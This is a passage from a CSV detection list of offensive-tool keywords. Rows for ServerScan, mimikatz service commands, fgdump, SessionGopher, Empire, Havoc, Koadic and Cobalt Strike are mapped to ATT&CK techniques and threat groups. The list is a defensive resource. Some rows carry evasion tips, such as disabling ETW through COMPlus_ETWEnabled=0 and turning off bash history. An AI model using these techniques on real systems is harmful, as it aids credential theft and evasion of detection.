a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*serverscan64 *,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,0,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*serverscan64 *tcp*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,0,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*serverscan86 *,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,0,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*Server-Side-Request-Forgery-Payloads.*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*service/executable/,offensive_tool_keyword,C2 related tools,An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Ed1s0nZ/cool,1,1,N/A,10,10,668,113,2023-07-13T07:04:30Z,2021-11-10T14:32:34Z -*service/executable/compile.exe*,offensive_tool_keyword,C2 related tools,An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Ed1s0nZ/cool,1,1,N/A,10,10,668,113,2023-07-13T07:04:30Z,2021-11-10T14:32:34Z -*service::me*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*service::preshutdown*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*service::remove*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*service::resume*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*service::shutdown*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*service::start*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*service::stop*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*service::suspend*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*service_permissions_escalate.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ServiceHavoc.exe,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*servicemove*hid.dll*,offensive_tool_keyword,cobaltstrike,New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/ServiceMove-BOF,1,1,N/A,10,10,223,45,2022-02-23T07:17:38Z,2021-08-16T07:16:31Z -*servpw.exe*,offensive_tool_keyword,fgdump,A utility for dumping passwords on Windows NT/2000/XP/2003 machines,T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001,TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008,N/A,Volt Typhoon,Credential Access,https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*servpw64.exe*,offensive_tool_keyword,fgdump,A utility for dumping passwords on Windows NT/2000/XP/2003 machines,T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001,TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008,N/A,Volt Typhoon,Credential Access,https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*SessionGopher*,offensive_tool_keyword,SessionGopher,SessionGopher is a PowerShell tool that finds and decrypts saved session information for remote access tools. It has WMI functionality built in so it can be run remotely. Its best use case is to identify systems that may connect to Unix systems. jump boxes. or point-of-sale terminals.,T1081 - T1087 - T1119,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/Arvanaghi/SessionGopher,1,1,N/A,N/A,10,1095,173,2022-11-22T21:33:23Z,2017-03-08T02:49:32Z -*SessionGopher.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*set * virus_scanner*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*set AutoRunScript multi_console_command -rc /root/*.rc*,offensive_tool_keyword,metasploit,Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback,T1059 - T1064 - T1029,TA0002 - TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*set CertPath data/*,offensive_tool_keyword,empire,empire command lines patterns,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*set CollectionMethodAll*,offensive_tool_keyword,empire,Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*set COMPlus_ETWEnabled=0*,offensive_tool_keyword,ETW,stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call,T1055.001 - T1059.001 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*set havoc *,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*set history +o*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*set hosts_stage*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*set keylogger*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*set LFILE /*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*Set Listener dbx*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*set Listener onedrive*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary 